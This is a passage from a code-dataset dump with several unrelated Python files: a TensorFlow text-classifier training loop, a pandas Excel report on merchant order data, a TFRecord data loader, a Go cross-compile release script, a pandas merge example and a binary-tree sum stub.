tf.matmul(self.fc1, w) + b\n self.prob = tf.sigmoid(self.scores)\n\n # Calculate mean cross-entropy loss\n with tf.name_scope(\"loss\"):\n self.bce_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.scores,\n labels=self.input_y))\n # with tf.name_scope(\"train\"):\n # self.train_step = tf.train.AdamOptimizer(lr).minimize(self.bce_loss)\n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser()\n\n # DONOTCHANGE: They are reserved for nsml\n args.add_argument('--mode', type=str, default='train')\n args.add_argument('--pause', type=int, default=0)\n args.add_argument('--iteration', type=str, default='0')\n\n # User options\n # model's specification (hyper-parameters)\n args.add_argument('--output', type=int, default=1)\n args.add_argument('--epochs', type=int, default=50 + 1)\n args.add_argument('--batch', type=int, default=128) # best\n args.add_argument('--embeds', type=int, default=16) # best\n args.add_argument('--depth', type=int, default=29) # best\n args.add_argument('--shortcut', type=bool, default=True) # best\n args.add_argument('--strmaxlen', type=int, default=1024) #\n args.add_argument('--fc_units', type=int, default=1024) #\n args.add_argument('--threshold', type=float, default=0.5)\n args.add_argument('--lr', type=float, default=9e-3)\n config = args.parse_args()\n\n if not HAS_DATASET and not IS_ON_NSML: # It is not running on nsml\n DATASET_PATH = '../sample_data/kin/'\n\n character_size = 251\n # VDCNN Model\n textcnn = TextCNN(depth=config.depth,\n embedding_size=config.embeds, sequence_max_length=config.strmaxlen,\n optional_shortcut=config.shortcut,\n fc_units=config.fc_units,\n lr=config.lr)\n x = textcnn.input_x\n y_ = textcnn.input_y\n is_train = textcnn.is_training\n prob = textcnn.prob\n bce_loss = textcnn.bce_loss\n # train_step = textcnn.train_step\n\n sess = tf.Session()\n\n # DONOTCHANGE: Reserved for nsml\n bind_model(sess=sess, config=config)\n\n # DONOTCHANGE: Reserved for nsml\n if config.pause:\n nsml.paused(scope=locals())\n\n if config.mode == 'train':\n dataset = KinQueryDataset(DATASET_PATH, config.strmaxlen)\n\n dataset_len = len(dataset)\n one_batch_size = dataset_len // config.batch\n if dataset_len % config.batch != 0:\n one_batch_size += 1\n\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n learning_rate = tf.train.exponential_decay(config.lr, global_step,\n config.epochs * one_batch_size, 0.95, staircase=True)\n # train_step = tf.train.AdamOptimizer(learning_rate).minimize(bce_loss)\n optimizer = tf.train.MomentumOptimizer(learning_rate, 0.9)\n gradients, variables = zip(*optimizer.compute_gradients(bce_loss))\n gradients, _ = tf.clip_by_global_norm(gradients, 7.0)\n train_op = optimizer.apply_gradients(zip(gradients, variables), global_step=global_step)\n\n sess.run(tf.global_variables_initializer())\n\n for epoch in range(config.epochs):\n avg_loss = 0.\n for i, (data, labels) in enumerate(_batch_loader(dataset, config.batch)):\n _, loss, _ = sess.run([train_op, bce_loss, global_step],\n feed_dict={\n x: data,\n y_: labels,\n is_train: True,\n })\n\n _ = tf.train.global_step(sess, global_step)\n\n print('Batch : ', i + 1, '/', one_batch_size, ', BCE in this minibatch: ', float(loss))\n avg_loss += float(loss)\n\n print('epoch:', epoch, ' train_loss:', float(avg_loss / one_batch_size))\n\n nsml.report(summary=True, scope=locals(), epoch=epoch, epoch_total=config.epochs,\n train__loss=float(avg_loss / one_batch_size), step=epoch)\n\n # DONOTCHANGE (You can decide how often you want to save the model)\n nsml.save(epoch)\n\n # [(0.3, 0), (0.7, 1), ... ]\n elif config.mode == 'test_local':\n with open(os.path.join(DATASET_PATH, 'train/train_data'), 'rt', encoding='utf-8') as f:\n queries = f.readlines()\n res = []\n for batch in _batch_loader(queries, config.batch):\n temp_res = nsml.infer(batch)\n res += temp_res\n\n print(res)\n","sub_path":"kin/vdcnn/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"412286545","text":"\"\"\"\n计算各城市商家运营数据情况\n\"\"\"\nimport pandas as pd\nfrom datetime import datetime\ntimes = datetime.now().strftime('%Y-%m-%d')\n\nfilename = '沙县11月各商家运营数据.xlsx'\nsheet_name = pd.ExcelFile(filename).sheet_names\n# print(sheet_name) # ['沙县', '安陆', '丹江口'] 返回值是列表\nfor sheet in sheet_name:\n if sheet == '沙县':\n gmv = 2160776.78\n order = 54250\n agent_money = 182178.55\n different_rate = 0.0107\n df01 = pd.read_excel(filename, sheet)\n # df[['col2', 'col3']] = df[['col2', 'col3']].apply(pd.to_numeric)\n # 将百分数转化为小数\n # df01 = df01.where(df01.notnull(), 0) # 把所有为空的列的值改为None\n df01.ix[df01['非顾客原因异常订单率'] == '-', '非顾客原因异常订单率'] = 0\n df01['非顾客原因异常订单率'] = df01['非顾客原因异常订单率'].str.strip('%').astype(float) / 100\n # print(df01['非顾客原因异常订单率'])\n df01 = df01.drop(['是否有双证'], axis=1) # 删除列\n df01 = df01.drop(['是否签署SD合作协议'], axis=1) # 删除列\n df01 = df01.drop(['一级品类'], axis=1) # 删除列\n df01 = df01.drop(['二级品类'], axis=1) # 删除列\n df01 = df01.drop(['代理商名称'], axis=1) # 删除列\n df01 = df01.drop(['商家ID'], axis=1) # 删除列\n df01 = df01.drop(['配送方式'], axis=1) # 删除列\n df01 = df01.drop(['实际支付交易额'], axis=1) # 删除列\n # df01 = df01.drop(['配送方式'], axis=1) # 删除列\n df01['原价交易额贡献占比'] = 0 # 可以增加新的列\n df01['原价交易额贡献占比'] = df01.apply(lambda x: df01['原价交易额']/gmv)\n df01['原价交易额贡献占比'] = df01['原价交易额贡献占比'].apply(lambda x: format(x, '.2%'))\n df01['订单数贡献占比'] = 0\n df01['订单数贡献占比'] = df01.apply(lambda x: df01['订单数'] / order)\n df01['订单数贡献占比'] = df01['订单数贡献占比'].apply(lambda x: format(x, '.2%'))\n df01['代补金额贡献占比'] = 0\n df01['代补金额贡献占比'] = df01.apply(lambda x: df01['代理商补贴金额'] / agent_money)\n df01['代补金额贡献占比'] = df01['代补金额贡献占比'].apply(lambda x: format(x, '.2%'))\n df01['非异贡献占比'] = 0\n df01['非异贡献占比'] = df01.apply(lambda x: df01['非顾客原因异常订单率'] / different_rate)\n df01['非异贡献占比'] = df01['非异贡献占比'].apply(lambda x: format(x, '.2%'))\n # 排序 一定要记得先将数据转化成 int类型\n # df01.sort_values([\"原价交易额贡献占比\", \"订单数贡献占比\", '代补金额贡献占比', '非异贡献占比'], ascending=False)\n df01[\"订单数\"] = df01[\"订单数\"].astype(\"int\") # 强制转化类型\n # inplace表示再排序的时候是否生成一个新的dataframe 结构\n df01.sort_values([\"原价交易额贡献占比\"], inplace=True, ascending=False)\n print(df01)\n df01 = df01.head(30)\n df01.set_index(['外卖组织结构'], inplace=True)\n url = 'C:/Users/王颖/Desktop/'\n df01.to_excel(url + '沙县11月各商家数据明细.xlsx')\n # bd_name = df01['BD名称'].get_values()\n # BD_name = list(bd_name) # 直接转列表\n # BD_name_list = set(BD_name)\n # BD_name_list = list(BD_name_list)\n # row_num = len(BD_name_list)\n # city_name = list(df01['外卖组织结构'])[0]\n # k_titile_list = ['拒单率', '不接单率', '业务端非异率']\n # city_list = [city_name]*row_num # 生成多少个元素的列表\n # list01 = ['订单数', '商家拒单订单数', '商家不接单订单数']\n # order_list = []\n # bus_refuse_order = []\n # bus_no_order = []\n # n = 0\n # for field in list01:\n # n += 1\n # for name in BD_name_list:\n # f = df01.loc[df01['BD名称'] == name][field].get_values()\n # f = list(f)\n # order_num = sum(f)\n # if n == 1:\n # order_list.append(order_num)\n # if n == 2:\n # bus_refuse_order.append(order_num)\n # if n == 3:\n # bus_no_order.append(order_num)\n # print(order_list, bus_refuse_order, bus_no_order)\n # d = {'城市': city_list, 'BD名称': BD_name_list, '订单数': order_list, '商家拒单订单数': bus_refuse_order,\n # '商家不接单订单数': bus_no_order}\n # labels = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\n # df01 = pd.DataFrame(d)\n # # refuse_lv = df['商家拒单订单数']/df['订单数'] 整列整除\n # # print(refuse_lv)\n # df01.eval('拒单率 = 商家拒单订单数/订单数', inplace=True) # 对dataframe进行操作生成新的列\n # df01.eval('不接单率 = 商家不接单订单数/订单数', inplace=True)\n # df01.eval('业务端非异率 = 拒单率+不接单率', inplace=True) # 可以对新插入的列进行操作\n # # 对数据的格式进行转换\n # df01['拒单率'] = df01['拒单率'].apply(lambda x: format(x, '.2%'))\n # df01['不接单率'] = df01['不接单率'].apply(lambda x: format(x, '.2%'))\n # df01['业务端非异率'] = df01['业务端非异率'].apply(lambda x: format(x, '.2%'))\n # df01.set_index(['城市'], inplace=True)\n# if sheet == '安陆':\n# df02 = pd.read_excel(filename, sheet)\n# bd_name = df02['BD名称'].get_values()\n# BD_name = list(bd_name) # 直接转列表\n# BD_name_list = set(BD_name)\n# BD_name_list = list(BD_name_list)\n# row_num = len(BD_name_list)\n# city_name = list(df02['外卖组织结构'])[0]\n# k_titile_list = ['拒单率', '不接单率', '业务端非异率']\n# # BD_name_list = ['池美琴', '管尊槟', '刘慧思', '罗奋辉', '马万恒', '彭友焰', '邹杨']\n# # city_list = ['沙县', '沙县', '沙县', '沙县', '沙县', '沙县', '沙县']\n# city_list = [city_name] * row_num\n# list01 = ['订单数', '商家拒单订单数', '商家不接单订单数']\n# order_list = []\n# bus_refuse_order = []\n# bus_no_order = []\n# n = 0\n# for field in list01:\n# n += 1\n# for name in BD_name_list:\n# f = df02.loc[df02['BD名称'] == name][field].get_values()\n# f = list(f)\n# order_num = sum(f)\n# if n == 1:\n# order_list.append(order_num)\n# if n == 2:\n# bus_refuse_order.append(order_num)\n# if n == 3:\n# bus_no_order.append(order_num)\n# print(name, order_num)\n# print(order_list, bus_refuse_order, bus_no_order)\n# d = {'城市': city_list, 'BD名称': BD_name_list, '订单数': order_list, '商家拒单订单数': bus_refuse_order,\n# '商家不接单订单数': bus_no_order}\n# df02 = pd.DataFrame(d)\n# df02.eval('拒单率 = 商家拒单订单数/订单数', inplace=True) # 对dataframe进行操作生成新的列\n# df02.eval('不接单率 = 商家不接单订单数/订单数', inplace=True)\n# df02.eval('业务端非异率 = 拒单率+不接单率', inplace=True) # 可以对新插入的列进行操作\n# df02['拒单率'] = df02['拒单率'].apply(lambda x: format(x, '.2%'))\n# df02['不接单率'] = df02['不接单率'].apply(lambda x: format(x, '.2%'))\n# df02['业务端非异率'] = df02['业务端非异率'].apply(lambda x: format(x, '.2%'))\n# df02.set_index(['城市'], inplace=True)\n# if sheet == '丹江口':\n# df03 = pd.read_excel(filename, sheet)\n# bd_name = df03['BD名称'].get_values()\n# BD_name = list(bd_name) # 直接转列表\n# BD_name_list = set(BD_name)\n# BD_name_list = list(BD_name_list)\n# row_num = len(BD_name_list)\n# city_name = list(df03['外卖组织结构'])[0]\n# k_titile_list = ['拒单率', '不接单率', '业务端非异率']\n# # BD_name_list = ['池美琴', '管尊槟', '刘慧思', '罗奋辉', '马万恒', '彭友焰', '邹杨']\n# # city_list = ['沙县', '沙县', '沙县', '沙县', '沙县', '沙县', '沙县']\n# city_list = [city_name] * row_num\n# list01 = ['订单数', '商家拒单订单数', '商家不接单订单数']\n# order_list = []\n# bus_refuse_order = []\n# bus_no_order = []\n# n = 0\n# for field in list01:\n# n += 1\n# for name in BD_name_list:\n# f = df03.loc[df03['BD名称'] == name][field].get_values()\n# f = list(f)\n# order_num = sum(f)\n# if n == 1:\n# order_list.append(order_num)\n# if n == 2:\n# bus_refuse_order.append(order_num)\n# if n == 3:\n# bus_no_order.append(order_num)\n# print(name, order_num)\n# print(order_list, bus_refuse_order, bus_no_order)\n# d = {'城市': city_list, 'BD名称': BD_name_list, '订单数': order_list, '商家拒单订单数': bus_refuse_order,\n# '商家不接单订单数': bus_no_order}\n# labels = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\n# df03 = pd.DataFrame(d)\n# df03.eval('拒单率 = 商家拒单订单数/订单数', inplace=True) # 对dataframe进行操作生成新的列\n# df03.eval('不接单率 = 商家不接单订单数/订单数', inplace=True)\n# df03.eval('业务端非异率 = 拒单率+不接单率', inplace=True) # 可以对新插入的列进行操作\n# df03['拒单率'] = df03['拒单率'].apply(lambda x: format(x, '.2%'))\n# df03['不接单率'] = df03['不接单率'].apply(lambda x: format(x, '.2%'))\n# df03['业务端非异率'] = df03['业务端非异率'].apply(lambda x: format(x, '.2%'))\n# df03.set_index(['城市'], inplace=True)\n# if sheet == '桑植':\n# df04 = pd.read_excel(filename, sheet)\n# bd_name = df04['BD名称'].get_values()\n# BD_name = list(bd_name) # 直接转列表\n# BD_name_list = set(BD_name)\n# BD_name_list = list(BD_name_list)\n# row_num = len(BD_name_list)\n# city_name = list(df04['外卖组织结构'])[0]\n# k_titile_list = ['拒单率', '不接单率', '业务端非异率']\n# # BD_name_list = ['池美琴', '管尊槟', '刘慧思', '罗奋辉', '马万恒', '彭友焰', '邹杨']\n# # city_list = ['沙县', '沙县', '沙县', '沙县', '沙县', '沙县', '沙县']\n# city_list = [city_name] * row_num\n# list01 = ['订单数', '商家拒单订单数', '商家不接单订单数']\n# order_list = []\n# bus_refuse_order = []\n# bus_no_order = []\n# n = 0\n# for field in list01:\n# n += 1\n# for name in BD_name_list:\n# f = df04.loc[df04['BD名称'] == name][field].get_values()\n# f = list(f)\n# order_num = sum(f)\n# if n == 1:\n# order_list.append(order_num)\n# if n == 2:\n# bus_refuse_order.append(order_num)\n# if n == 3:\n# bus_no_order.append(order_num)\n# print(name, order_num)\n# print(order_list, bus_refuse_order, bus_no_order)\n# d = {'城市': city_list, 'BD名称': BD_name_list, '订单数': order_list, '商家拒单订单数': bus_refuse_order,\n# '商家不接单订单数': bus_no_order}\n# labels = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\n# df04 = pd.DataFrame(d)\n# df04.eval('拒单率 = 商家拒单订单数/订单数', inplace=True) # 对dataframe进行操作生成新的列\n# df04.eval('不接单率 = 商家不接单订单数/订单数', inplace=True)\n# df04.eval('业务端非异率 = 拒单率+不接单率', inplace=True) # 可以对新插入的列进行操作\n# df04['拒单率'] = df04['拒单率'].apply(lambda x: format(x, '.2%'))\n# df04['不接单率'] = df04['不接单率'].apply(lambda x: format(x, '.2%'))\n# df04['业务端非异率'] = df04['业务端非异率'].apply(lambda x: format(x, '.2%'))\n# df04.set_index(['城市'], inplace=True)\n# if sheet == '孝昌':\n# df05 = pd.read_excel(filename, sheet)\n# bd_name = df05['BD名称'].get_values()\n# BD_name = list(bd_name) # 直接转列表\n# BD_name_list = set(BD_name)\n# BD_name_list = list(BD_name_list)\n# row_num = len(BD_name_list)\n# city_name = list(df05['外卖组织结构'])[0]\n# k_titile_list = ['拒单率', '不接单率', '业务端非异率']\n# # BD_name_list = ['池美琴', '管尊槟', '刘慧思', '罗奋辉', '马万恒', '彭友焰', '邹杨']\n# # city_list = ['沙县', '沙县', '沙县', '沙县', '沙县', '沙县', '沙县']\n# city_list = [city_name] * row_num\n# list01 = ['订单数', '商家拒单订单数', '商家不接单订单数']\n# order_list = []\n# bus_refuse_order = []\n# bus_no_order = []\n# n = 0\n# for field in list01:\n# n += 1\n# for name in BD_name_list:\n# f = df05.loc[df05['BD名称'] == name][field].get_values()\n# f = list(f)\n# order_num = sum(f)\n# if n == 1:\n# order_list.append(order_num)\n# if n == 2:\n# bus_refuse_order.append(order_num)\n# if n == 3:\n# bus_no_order.append(order_num)\n# print(name, order_num)\n# print(order_list, bus_refuse_order, bus_no_order)\n# d = {'城市': city_list, 'BD名称': BD_name_list, '订单数': order_list, '商家拒单订单数': bus_refuse_order,\n# '商家不接单订单数': bus_no_order}\n# labels = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\n# df05 = pd.DataFrame(d)\n# df05.eval('拒单率 = 商家拒单订单数/订单数', inplace=True) # 对dataframe进行操作生成新的列\n# df05.eval('不接单率 = 商家不接单订单数/订单数', inplace=True)\n# df05.eval('业务端非异率 = 拒单率+不接单率', inplace=True) # 可以对新插入的列进行操作\n# df05['拒单率'] = df05['拒单率'].apply(lambda x: format(x, '.2%'))\n# df05['不接单率'] = df05['不接单率'].apply(lambda x: format(x, '.2%'))\n# df05['业务端非异率'] = df05['业务端非异率'].apply(lambda x: format(x, '.2%'))\n# df05.set_index(['城市'], inplace=True)\n#\n# # 将多个dataframe数据写入同一个Excel的不同sheet中\n# url = 'C:/Users/王颖/Desktop/changzhoufeiniao_工作表/'\n# with pd.ExcelWriter(url+\"BD商家非异率统计表.xlsx\") as writer:\n# df01.to_excel(writer, sheet_name='沙县')\n# df02.to_excel(writer, sheet_name='安陆')\n# df03.to_excel(writer, sheet_name='丹江口')\n# df04.to_excel(writer, sheet_name='桑植')\n# df05.to_excel(writer, sheet_name='孝昌')\n\n\n\n","sub_path":"execl_04.py","file_name":"execl_04.py","file_ext":"py","file_size_in_byte":15761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78837693","text":"from .transforms import DataAugmenter\nimport threading\n\nimport numpy as np\nfrom glob import glob\nimport tensorflow as tf\nimport cv2\nimport os\nfrom tqdm import tqdm\nimport itertools\n# from imblearn.keras import BalancedBatchGenerator, balanced_batch_generator\n# from imblearn.over_sampling import RandomOverSampler\nfrom tensorflow.keras.utils import Sequence, to_categorical\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n\nAUTOTUNE = tf.data.experimental.AUTOTUNE\n# CLASS_NAMES = ['unknown', 'person', 'lie_down', ]\n\n\nclass Dataprocessor:\n def __init__(self, args):\n self.args = args\n self.classes = self.read_classes(args.TRAIN_DIR)\n self.total_train = self.make_tfrecord(args.TRAIN_DIR)\n self.total_val = self.make_tfrecord(args.VAL_DIR)\n self.train_tfrecords = self.load_tfrecord(args.TRAIN_DIR)\n self.train_tfrecords = self.create_dataset(self.train_tfrecords)\n self.val_tfrecords = self.load_tfrecord(args.VAL_DIR)\n self.val_tfrecords = self.create_dataset(self.val_tfrecords, True)\n\n @property\n def train_length(self):\n return self.total_train // self.args.BATCH_SIZE\n\n @property\n def val_length(self):\n return self.total_val // self.args.BATCH_SIZE\n\n def create_dataset(self, tfrecords, is_val=False):\n augmentation = DataAugmenter(self.args, is_val)\n if self.args.MODEL.AUTOML:\n dirs = self.args.TRAIN_DIR if not is_val else self.args.VAL_DIR\n train_gen = tf.keras.preprocessing.image.ImageDataGenerator(preprocessing_function=augmentation)\n data_gens = [train_gen.flow_from_directory(\n directory=d,\n batch_size=self.args.BATCH_SIZE,\n shuffle=True,\n target_size=(self.args.DATA.SIZE[1], self.args.DATA.SIZE[0]),\n ) for d in dirs]\n data_gens = itertools.chain(*data_gens)\n\n def callable_iterator(generator):\n for img_batch, targets_batch in generator:\n yield img_batch, targets_batch\n\n return tf.data.Dataset.from_generator(lambda: callable_iterator(data_gens), output_types=(tf.float32, tf.float32))\n\n else:\n if not is_val:\n return tfrecords.repeat()\\\n .shuffle(self.args.DATA.SHUFFLE_SIZE)\\\n .map(augmentation)\\\n .batch(self.args.BATCH_SIZE)\\\n .prefetch(buffer_size=AUTOTUNE)\n else:\n return tfrecords.map(augmentation)\\\n .batch(self.args.BATCH_SIZE)\\\n .prefetch(buffer_size=AUTOTUNE)\n\n def read_classes(self, paths):\n if len(self.args.MODEL.CLASSES) > 1 and self.args.MODEL.CLASSES[0] != None:\n # print(self.args.MODEL.CLASSES)\n return self.args.MODEL.CLASSES\n print(f'read classes from data path: {paths} ..')\n dirs = set()\n for path in paths:\n classes = [os.path.basename(f) for f in glob(os.path.join(path, '*')) if os.path.isdir(f)]\n # print(classes)\n dirs = dirs.union(set(classes))\n \n dirs = sorted(list(dirs))\n assert self.args.MODEL.NUM_CLASSES == len(dirs), f'only {len(dirs)} class exists!'\n assert len(dirs) > 1, f'only {len(dirs)} class exists!'\n print(f'{len(dirs)} classes exist')\n for name in dirs:\n print(name)\n \n print('Loading class finished!')\n return dirs\n\n def make_tfrecord(self, paths):\n lengths = []\n for path in paths:\n record_file = os.path.join(path, f'data_{len(self.classes)}.tfrecords')\n if os.path.exists(record_file):\n with open(record_file + f'_{len(self.classes)}.length', 'r') as l:\n lengths.append(int(l.readline()))\n continue\n \n files = [f for f in glob(os.path.join(path, '*/*')) if f.endswith('jpg') or f.endswith('.png')]\n # print(os.path.join(path, '*/*.{jpg,png}'))\n # print(files)\n np.random.shuffle(files)\n print('making tfrecords..')\n # options = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.GZIP)\n length = 0\n with tf.io.TFRecordWriter(record_file) as writer:\n for f in tqdm(files):\n image_string = open(f, 'rb').read()\n label = os.path.basename(os.path.dirname(f))\n tf_example = self.__make_feature_from(image_string, label)\n if tf_example == None:\n continue\n length += 1\n writer.write(tf_example.SerializeToString())\n lengths.append(length)\n with open(record_file + f'_{len(self.classes)}.length', 'w') as l:\n l.write(str(length))\n\n return sum(lengths)\n\n def __make_feature_from(self, image_string, label):\n try:\n label = self.classes.index(label)\n except:\n return None\n image_shape = tf.image.decode_jpeg(image_string).shape\n if isinstance(image_string, type(tf.constant(0))):\n image_string = image_string.numpy()\n h, w, _ = image_shape\n feature = {\n 'height': tf.train.Feature(int64_list=tf.train.Int64List(value=[h])),\n 'width': tf.train.Feature(int64_list=tf.train.Int64List(value=[w])),\n 'label': tf.train.Feature(int64_list=tf.train.Int64List(value=[label])),\n 'image': tf.train.Feature(bytes_list=tf.train.BytesList(value=[image_string])),\n }\n return tf.train.Example(features=tf.train.Features(feature=feature))\n\n def load_tfrecord(self, paths):\n records = []\n image_feature_description = {\n 'height': tf.io.FixedLenFeature([], tf.int64),\n 'width': tf.io.FixedLenFeature([], tf.int64),\n 'label': tf.io.FixedLenFeature([], tf.int64),\n 'image': tf.io.FixedLenFeature([], tf.string),\n }\n record_paths = [os.path.join(path, f'data_{len(self.classes)}.tfrecords') for path in paths]\n dataset = tf.data.TFRecordDataset(record_paths)\n\n def _parse_image_function(example_proto):\n # Parse the input tf.Example proto using the dictionary above.\n example = tf.io.parse_single_example(example_proto, image_feature_description)\n # image = tf.io.decode_raw(example['image'], tf.uint8)\n image = tf.image.decode_jpeg(example['image'], channels=3, dct_method='INTEGER_ACCURATE')\n image = tf.reshape(image, [example['height'], example['width'], 3])\n return image, example['label']\n\n return dataset.map(_parse_image_function, num_parallel_calls=AUTOTUNE)\n\n\n# def image_resize(image, size):\n# width, height = size\n# # initialize the dimensions of the image to be resized and\n# # grab the image size\n# origin_width = width\n# origin_height = height\n# dim = None\n# (h, w) = image.shape[:2]\n\n# if h > w:\n# width = None\n# else:\n# height = None\n\n# # if both the width and height are None, then return the\n# # original image\n# # if width is None and height is None:\n# # return image\n\n# # check to see if the width is None\n# if width is None:\n# # calculate the ratio of the height and construct the\n# # dimensions\n# r = height / float(h)\n# dim = (int(w * r), height)\n\n# # otherwise, the height is None\n# else:\n# # calculate the ratio of the width and construct the\n# # dimensions\n# r = width / float(w)\n# dim = (width, int(h * r))\n# # resize the image\n# resized = cv2.resize(image, dim)\n\n# # return the resized image\n# resized = pad_size(resized, origin_width, origin_height)\n# return resized\n\n\n# def pad_size(image, width, height):\n# (h, w) = image.shape[:2]\n# # print('vertical: ', (height - h), ' horizontal: ', width-w)\n# top, bottom = (height - h) // 2, (height - h) - ((height - h) // 2)\n# left, right = (width - w) // 2, (width - w) - ((width - w) // 2)\n# # print((height - h), ' ', 0, ' ', (width - w), ' ')\n# # print('top: ', top, ' bottom: ', bottom, ' left: ', left, ' right: ', right)\n# image = cv2.copyMakeBorder(image, top, bottom, left, right, cv2.BORDER_CONSTANT, value=0)\n# return image\n\n\n# def decode_img(img, mean, std, size):\n# # print('*'*50)\n# # print(img)\n# # convert the compressed string to a 3D uint8 tensor\n# img = cv2.imread(img[0])#.astype(float)\n# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n# img = image_resize(img, size).astype(float)\n# img = (img - mean) / std\n\n# # print(img.shape)\n# # img = tf.io.read_file(img[0])\n# # img = tf.image.decode_jpeg(img, channels=3)\n# # # Use `convert_image_dtype` to convert to floats in the [0,1] range.\n# # img = tf.image.convert_image_dtype(img, tf.float32).eval()\n# # resize the image to the desired size.\n# # print(img.shape)\n# # print('8'*80)\n# return img\n\n\n# def to_onehot(index):\n# result = np.zeros([len(CLASS_NAMES)])\n# result[index] = 1\n# return result\n\n\n# def data_ready(path):\n# images = sorted(glob(os.path.join(path, '*/*.jpg')))\n# return np.array(images).reshape(-1, 1), np.array([CLASS_NAMES.index(i.split('/')[-2]) for i in images])\n\n\n# class ValGenerator(Sequence):\n# def __init__(self, x, y, mean, std, size):\n# self.lock = threading.Lock()\n# self.x = x\n# self.y = y\n# self.datagen = ImageDataGenerator(\n# rescale=1/255)\n# self._shape = x.shape\n# self.mean = np.array(mean).reshape(1, 1, -1)\n# self.std = np.array(std).reshape(1, 1, -1)\n# self.size = size\n# # self.gen, self.steps_per_epoch = balanced_batch_generator(x.reshape(-1, 1), y.reshape(-1, 1), sampler=RandomOverSampler(), batch_size=self.batch_size, keep_sparse=True)\n\n# def __len__(self):\n# return self._shape[0]\n\n# def __getitem__(self, idx):\n# with self.lock:\n# x_batch, y_batch = self.x[idx:idx+1], self.y[idx: idx+1]\n# x_batch, y_batch = np.stack([decode_img(i, self.mean, self.std, self.size) for i in x_batch]), to_categorical(y_batch.reshape(-1), num_classes=3)\n# # print(x_batch.shape)\n# # x_batch = x_batch.reshape(-1, *self._shape[1:])\n# return self.datagen.flow(x_batch, y_batch, batch_size=1).next()\n\n\n# class CustomBalancedDataGenerator(Sequence):\n# \"\"\"ImageDataGenerator + RandomOversampling\"\"\"\n# def __init__(self, x, y, batch_size, mean, std, size):\n# self.lock = threading.Lock()\n# self.datagen = ImageDataGenerator(\n# rescale=1/255,\n# # featurewise_center=True,\n# # featurewise_std_normalization=True,\n# rotation_range=3,\n# width_shift_range=0.2,\n# height_shift_range=0.2,\n# horizontal_flip=True)\n# self.size = size\n# self.batch_size = batch_size\n# self._shape = x.shape\n# self.mean = np.array(mean).reshape(1, 1, -1)\n# self.std = np.array(std).reshape(1, 1, -1)\n# self.gen, self.steps_per_epoch = balanced_batch_generator(x.reshape(-1, 1), y.reshape(-1, 1), sampler=RandomOverSampler(), batch_size=self.batch_size, keep_sparse=True)\n\n# def __len__(self):\n# return self._shape[0] // self.batch_size\n\n# def __getitem__(self, idx):\n# with self.lock:\n# x_batch, y_batch = self.gen.__next__()\n# x_batch, y_batch = np.stack([decode_img(i, self.mean, self.std, self.size) for i in x_batch]), to_categorical(y_batch.reshape(-1), num_classes=3)\n# return self.datagen.flow(x_batch, y_batch, batch_size=self.batch_size).next()\n\ndef build_data(cfg):\n return Dataprocessor(cfg)\n # augment = Augmentor(True)\n # X, y = [], []\n # for folder in cfg.TRAIN_DIR:\n # data = data_ready(folder)\n # X.append(data[0])\n # y.append(data[1])\n # X = np.concatenate(X, axis=0)\n # y = np.concatenate(y, axis=0)\n\n # train_batches = CustomBalancedDataGenerator(\n # X, y, batch_size=cfg.BATCH_SIZE, mean=cfg.DATA.MEAN, std=cfg.DATA.STD, size=cfg.DATA.SIZE)\n \n # X, y = [], []\n # for folder in cfg.VAL_DIR:\n # data = data_ready(folder)\n # X.append(data[0])\n # y.append(data[1])\n # X = np.concatenate(X, axis=0)\n # y = np.concatenate(y, axis=0)\n # # X, y = data_ready(cfg.VAL_DIR)\n # val_batches = ValGenerator(X, y, mean=cfg.DATA.MEAN, std=cfg.DATA.STD, size=cfg.DATA.SIZE)\n ","sub_path":"classification/datasets/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":12815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"462295170","text":"#!/usr/bin/python3\n\nimport subprocess as sh\nfrom os import environ, mkdir\n\n\nVARIANTS = [\n ('darwin', 'amd64'),\n ('linux', '386'),\n ('linux', 'amd64'),\n ('windows', '386'),\n ('windows', 'amd64'),\n]\n\n\ndef extension(os):\n if os == 'windows':\n return '.exe'\n return ''\n\n\ndef executable_name(os, arch):\n return f'./bin/{os}_{arch}_sema{extension(os)}'\n\n\ndef compile():\n for os, arch in VARIANTS:\n environ['GOOS'] = os\n environ['GOARCH'] = arch\n sh.call(['go', 'build', '-o', executable_name(os, arch), '.'])\n\n\nif __name__ == '__main__':\n try:\n mkdir('bin')\n except FileExistsError:\n pass\n compile()\n","sub_path":"release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628510607","text":"import pandas as pd\n\n\ndef read_dataframes():\n train_df = pd.read_csv('../weekly_sales.csv')\n features_df = pd.read_csv('../features.csv')\n stores_df = pd.read_csv('../stores.csv')\n return train_df, features_df, stores_df\n\n\ntrain_df, features_df, stores_df = read_dataframes()\nmerged_features = features_df.merge(stores_df, on='Store')\n# -----------------------------\n\nfeatures = ['Store', 'Date', 'IsHoliday']\nfinal_dataset = train_df.merge(merged_features, on=features)\nfinal_dataset = final_dataset.drop(columns=['Date'])\n\nprint(final_dataset.columns.tolist())\n","sub_path":"AppliedTensorFlow/P2PreliminaryDataAnalysis/P6MergingData/P2.py","file_name":"P2.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"586141573","text":"\ndef main():\n list = [3,6,2,9,-1,10]\n\n print(solution(list))\n\n\n## Returns which side of a binary tree sums to a greater value\ndef solution(arr):\n level = None\n root = None\n\n sum_left = None\n sum_right = None\n\n i = 1\n i_ref = 1\n for n in arr:\n if level == None:\n level = 1;\n\n ## because we are doing level traversal, left and right indices would double each time\n if level > 1:\n i_ref = i_ref * 2\n\n if level == 1 and root == 